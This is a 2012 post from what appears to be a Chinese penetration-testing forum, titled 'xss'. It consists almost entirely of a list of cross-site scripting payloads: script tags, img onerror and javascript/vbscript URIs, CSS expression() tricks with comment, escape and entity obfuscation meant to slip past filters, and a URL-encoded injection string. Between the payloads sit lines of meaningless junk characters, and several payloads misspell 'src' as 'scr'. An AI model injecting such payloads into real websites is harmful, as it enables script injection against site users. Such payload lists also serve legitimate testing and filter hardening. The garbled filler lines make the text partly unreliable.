中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
, s8 j; H# p6 v3 G. p' Y. z8 k9 ?
<img scr=javascript:alert("跨站")></img>
) e6 t4 l7 E, R2 ~
<img scr="javascript: alert(/跨站/)></img>
$ s- F7 p: L0 W& |% M2 C: U
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
7 d! o3 E* k( k0 c
<img scr="#" onerror=alert(/跨站/)></img>
9 g" e9 E. ~/ _% X$ P( Z
<img scr="#" style="xss:expression(alert(/xss/));"></img>
4 H' c) ~. x3 u. _. Q
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 _ g, o4 N# ~- L3 l; Y0 c2 F
<img src=vbscript:msgbox ("xss")></img>
1 B% A7 X2 @0 V
<style> input {left:expression (alert('xss'))}</style>
7 g6 N8 O) i$ {, ^, ~1 `* {
<div style={left:expression (alert('xss'))}></div>
# j3 R4 b/ t$ q+ m- Z1 F3 C! f
<div style={left:exp/* */ression (alert('xss'))}></div>
+ i N8 C' H2 X |
<div style={left:\0065\0078ression (alert('xss'))}></div>
- S" f6 ?" p$ ]( Z( b
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
9 }1 U% [# @4 {1 @6 }& p
unicode <div style="{left:expRessioN (alert('xss'))}">
) f( K1 U, x0 H
: \3 t( P) s9 T$ Q
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
8 l$ \2 R3 }. O
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2